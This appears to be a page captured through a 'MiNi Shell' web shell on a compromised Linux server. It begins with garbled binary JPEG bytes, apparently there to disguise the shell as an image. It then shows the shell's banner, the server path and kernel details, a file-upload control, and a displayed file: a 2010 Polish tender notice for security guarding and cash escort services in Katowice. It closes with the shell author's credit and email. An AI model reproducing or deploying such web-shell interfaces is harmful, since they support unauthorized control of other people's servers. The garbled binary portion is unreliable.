JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101117/372546-N-2010.html

<p class="kh_header"><b>Katowice: Ochrona osób i mienia w KZK GOP oraz konwojowania wartości pieniężnych</b><br>
<b>Numer ogłoszenia: 372546 - 2010; data zamieszczenia: 17.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komunikacyjny Związek Komunalny Górnośląskiego Okręgu Przemysłowego , ul. Barbary 21a, 40-053 Katowice, woj. śląskie, tel. 0-32 7438401, 7438501, faks 0-32 2519745.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kzkgop.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: związek międzygminny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ochrona osób i mienia w KZK GOP oraz konwojowania wartości pieniężnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> <br>
1. Przedmiotem zamówienia jest Ochrona osób i mienia w KZK GOP oraz konwojowania wartości pieniężnych, w tym:<br>
a) Ochrona mienia w budynku KZK GOP przy ulicy Barbary 21A w Katowicach i na terenie przyległym, wykonywana przez całą dobę jednocześnie przez dwóch pracowników ochrony, obejmująca:<br>
- Całodobową usługę portierską z prowadzeniem ewidencji wydawania i przyjmowania kluczy do pomieszczeń osobom upoważnionym,<br>
- Sprawdzanie uprawnień do przebywania na terenie budynku oraz legitymowanie osób w celu ustalania ich tożsamości,<br>
- Wydawanie przepustek osobom z zewnątrz,<br>
- Monitorowanie budynku i nadzór nad monitoringiem,<br>
- Podejmowanie akcji ratowniczych w przypadku pożaru, awarii technicznych i innych nieprzewidzianych zdarzeń,<br>
- Dokonywanie dokładnego, systematycznego obchodu całego budynku, ze zwróceniem szczególnej uwagi na: stan drzwi wejściowych i wyjściowych, nienaruszalność zamknięć drzwi i okien budynku, w celu ujawnienia osób lub zjawisk mogących mieć wpływ na bezpieczeństwo chronionego obiektu,<br>
- Zakaz nieuzasadnionego opuszczenia nieruchomości podczas pełnienia służby<br>
- Zatrzymywanie osób podejrzanych o popełnienie przestępstw i wykroczeń oraz osób wynoszących lub wywożących różnego rodzaju przedmioty z chronionego obiektu - bez odpowiedniego zezwolenia, które nielegalnie usiłują wejść na teren chronionego obiektu do czasu przybycia policji,<br>
- W przypadku stwierdzenia zdarzeń takich jak: popełnienie przestępstwa, pożar, zalanie pomieszczeń lub innych do przewidzenia szkód - pracownicy ochrony  winni niezwłocznie powiadomić właściwe organy, to jest między innymi:<br>
- Komendę Rejonową Policji - Tel. 997,<br>
- Straż Pożarną - Tel. 998,<br>
- Dyżurnego Biura Ochrony<br>
- Zleceniodawcę<br>
W czasie prowadzonej akcji ratowniczej pracownicy ochrony winni strzec powierzonego majątku przed ewentualną kradzieżą, wandalizmem, czy też utratą itp. Do czasu przybycia służb ratowniczych winni organizować akcję ratowniczą we własnym zakresie,<br>
- Zwracanie uwagi po zmroku w czasie obchodu na właściwe oświetlenie terenu chronionego  budynku i stwierdzone usterki, wpisywać do raportu z powiadomieniem Zamawiającego,<br>
- Stała współpraca z Zamawiającym  w zakresie utrzymania ładu i porządku na terenie budynku i w jego otoczeniu.<br>
Zakres powyższych prac realizowanych przez dwóch pracowników ochrony nieposiadających licencji wynosi maksymalnie 1488 godzin miesięcznie.<br>
b) Konwojowanie i transportowanie wartości pieniężnych z siedziby KZK GOP przy ul. Barbary 21A do banku przy ul. Powstańców 25A oraz z banku do siedziby KZK GOP.<br>
Zakres powyższych prac wynosi maksymalnie 8 godzin i około 60 km miesięcznie.<br>
c) Konwojowanie i transportowanie wartości pieniężnych z automatów biletowych do siedziby Zamawiającego (kasety pieniężne o gabarytach: 25cm (wys.) x 18 cm (szer.) x 20 cm (głęb.) w ilości 35 szt.) wraz z pracownikiem Zamawiającego oraz z  Punktów Obsługi Pasażera zlokalizowanych na obszarze działania Zamawiającego do siedziby Zamawiającego, przy czym konwój powinien odbywać się zgodnie z wymogami zawartymi w ustawie o ochronie osób i mienia z dnia 22 sierpnia1997 r.  (Dz. U. z 2005 r. Nr 145 poz. 1221 z późn. zm.) oraz przez uprawnionych pracowników ochrony fizycznej, stosownie wyposażonych oraz przy użyciu odpowiednio przygotowanego samochodu (przestrzeń ładunkowa pojazdu służącego do transportu kasetek z automatów biletowych powinna zapewniać swobodny  załadunek, co najmniej 15 kasetek).<br>
Zakres powyższych prac wynosi miesięcznie około 50 godzin i około 1000 km.<br>
d) Monitorowanie przez całą dobę, we wszystkie dni tygodnia, również w niedziele i święta systemu alarmowego w wyznaczonych pomieszczeniach Zamawiającego w jego siedzibie oraz interwencji specjalistycznych grup interwencyjnych, celem sprawdzenia monitorowanych pomieszczeń - (w tym na zlecenie Zamawiającego nie więcej niż raz w miesiącu). <br>
e) Monitorowanie przez całą dobę, we wszystkie dni tygodnia, również w niedziele i święta systemu alarmowego wyznaczonych pomieszczeń Zamawiającego, tj. Punktów Obsługi Pasażera (POP) położonych w Gliwicach - 1 punkt,  Sosnowcu - 1 punkt i Bytomiu - 1 punkt, oraz interwencji specjalistycznych  grup interwencyjnych, celem sprawdzenia monitorowanych pomieszczeń - (w tym na zlecenie Zamawiającego nie więcej niż raz w miesiącu). <br>
2. Pracownicy ochrony wyposażeni mają być w: jednolite umundurowanie służbowe, identyfikatory imienne, środki łączności służące do kontaktu z Dyżurnym Biura Ochrony i właściwymi organami. <br>
3. Wykonawca przyjmuje odpowiedzialność prawną i finansową za szkody Zamawiającego na terenie obiektów wchodzących w skład zamówienia, powstałe w wyniku nieprawidłowego i nierzetelnego wykonywania usług z zakresu ochrony osób i mienia określonych umową z Zamawiającym i odpowiednimi przepisami.<br>
4. Wykonawca zobowiązuje się do sprawowania nadzoru nad pracownikami desygnowanymi do ochrony obiektów wchodzących w skład zamówienia; każde stwierdzone przez Zamawiającego naruszenie dyscypliny przez pracownika ochrony (pełnienie dyżuru przez czas dłuższy niż 12 godzin na dobę, nieuzasadnione nie meldowanie się o czasie w punktach kontrolnych, spanie podczas pełnienia dyżuru, pełnienie go w stanie nietrzeźwości, spożywanie alkoholu na terenie chronionego obiektu itp.) skutkować będzie obniżeniem miesięcznego wynagrodzenia Wykonawcy wymienionego w umowie o 10% wartości tego wynagrodzenia. W sytuacji nie obsadzenia posterunku ochrony z winy Wykonawcy, zgodnie z opisem przedmiotu zamówienia z SIWZ, Zamawiający nie zapłaci Wykonawcy wynagrodzenia, proporcjonalnie do okresu i zakresu, na który przypada nienależyte wykonanie usługi.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt 6 ustawy PZP o wartości nie większej niż 20 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień oraz dotyczących przedmiotu zamówienia, jeżeli zaistnieje taka konieczność</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.71.10.00-1, 79.71.40.00-2, 63.00.00.00-9, 98.34.11.20-2, 98.34.11.40-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 10 000,00 zł (słownie: dziesięć tysięcy złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać Wykonawcy spełniający warunki, o których mowa w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych dotyczące posiadania uprawnień do wykonywania określonej działalności, tj. posiadania koncesji na wykonywanie zadań związanych z ochroną osób i mienia oraz konwojowania wartości pieniężnych w zakresie wymaganym ustawą  z dnia 22 sierpnia 1997 r. o ochronie osób i mienia z póź. zm. (Dz. U. z 2005 r. nr 145, poz.1221 z późn. zm.).<br>
Ocena spełnienia warunku zostanie dokonana na podstawie dokumentu:<br>
Koncesja na wykonanie zadań związanych z ochroną osób i mienia w zakresie wymaganym ustawą z dnia 22 sierpnia 1997 roku o ochronie osób i mienia (Dz. U. z   2005 r. nr 145, poz. 1221 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać Wykonawcy spełniający warunki, o których mowa w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych dotyczące posiadania wiedzy i doświadczenia, tj. w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizowania należycie, co najmniej dwóch zamówień o podobnym do przedmiotu zamówienia charakterze i zakresie świadczonych usług (ochrona osób i mienia oraz konwojowanie wartości pieniężnych), każde o wartości nie mniejszej niż 300 000,00 zł brutto.<br>
Ocena spełnienia warunku zostanie dokonana na podstawie dokumentu:<br>
Wykaz, co najmniej dwóch wykonanych lub wykonywanych w okresie ostatnich trzech  lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie - usług o podobnym do przedmiotu zamówienia charakterze i zakresie (ochrona osób i mienia oraz konwojowanie wartości pieniężnych), każda o wartości nie mniejszej niż 300 000,00 zł brutto oraz dokumenty potwierdzające, że usługi te zostały wykonane należycie (Załącznik nr 3 do oferty)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać Wykonawcy spełniający warunki, o których mowa w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych dotyczące dysponowania  odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, tj.: <br>
- Co najmniej dziesięcioma osobami posiadającymi licencję pracownika ochrony fizycznej minimum I stopnia i dodatkowo, co najmniej dziesięcioma osobami nieposiadającymi takiej licencji.<br>
- Co najmniej jedną grupą interwencyjną zdolną dotrzeć do siedziby Zamawiającego w czasie 5 min. od momentu zgłoszenia konieczności podjęcia interwencji (w godzinach 20:00 - 7:00) i w ciągu 10 minut (w godzinach 7:00 -20:00) oraz do POP - ów, które znajdują się: w Sosnowcu, ul. Warszawska 3/17 (podziemny pasaż handlowy); w Gliwicach, ul. Piastów 2; w Bytomiu, Pl. Wolskiego (Dworzec autobusowy)  w ciągu 20 minut od momentu zgłoszenia.<br>
- Odpowiednim środkiem transportu przystosowanym do transportu wartości pieniężnych.<br>
- Własną stacją monitorowania oraz własną częstotliwością (pasmo, łącze bezprzewodowe) oraz wyposażeniem osób wykonujących usługi w system łączności radiowej do wzajemnego komunikowania się.<br>
Ocena spełnienia warunku zostanie dokonana na podstawie dokumentów:<br>
1) Oświadczenie, że Wykonawca dysponuje, co najmniej dziesięcioma osobami posiadającymi licencję pracownika ochrony fizycznej minimum I stopnia i dodatkowo, co najmniej dziesięcioma osobami nieposiadającymi takiej licencji (Załącznik nr 4 do oferty).<br>
2) Wykaz sprzętu, który będzie używany przy realizacji zamówienia (tabor samochodowy, stacja monitorowania, środki łączności, itp.) (Załącznik nr 5 do oferty).<br>
3) Oświadczenie, że Wykonawca dysponuje, co najmniej jedną specjalistyczną grupą interwencyjną, która może dotrzeć do siedziby Zamawiającego w ciągu 5 minut od momentu zgłoszenia konieczności podjęcia interwencji (w godzinach 20:00 - 7:00) i w ciągu 10 minut (w godzinach 7:00 - 20:00) oraz do POP-ów w najdłuższym czasie do 20 minut (Załącznik nr 6 do oferty)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać Wykonawcy spełniający warunki, o których mowa w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych dotyczące sytuacji ekonomicznej i finansowej, zapewniającej wykonanie zamówienia, co oznacza, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na sumę ubezpieczenia w wysokości, co najmniej 4 000 000,00 zł (słownie: cztery miliony złotych) na dzień składania ofert.<br>
Ocena spełnienia warunku zostanie dokonana na podstawie dokumentu opłaconej polisy, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia w wysokości, co najmniej 4 000 000,00 złotych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie, że Wykonawca dysponuje, co najmniej jedną specjalistyczną grupą interwencyjną, która może dotrzeć do siedziby Zamawiającego w ciągu 5 minut od  momentu zgłoszenia konieczności podjęcia interwencji (w godzinach 2000 - 700) i w ciągu 10 minut (w godzinach 700 - 2000) oraz do POP-ów w najdłuższym czasie do  20 minut  (Załącznik nr 6 do oferty)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.kzkgop.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komunikacyjny Związek Komunalny Górnośląskiego Okręgu Przemysłowego, 40-053 Katowice, ul. Barbary 21 A, pok. 138, I piętro (Wydział Zamówień Publicznych).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.11.2010 godzina 11:30, miejsce: Komunikacyjny Związek Komunalny Górnośląskiego Okręgu Przemysłowego, 40-053 Katowice, ul. Barbary 21 A, pok. 014, parter (Kancelaria).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com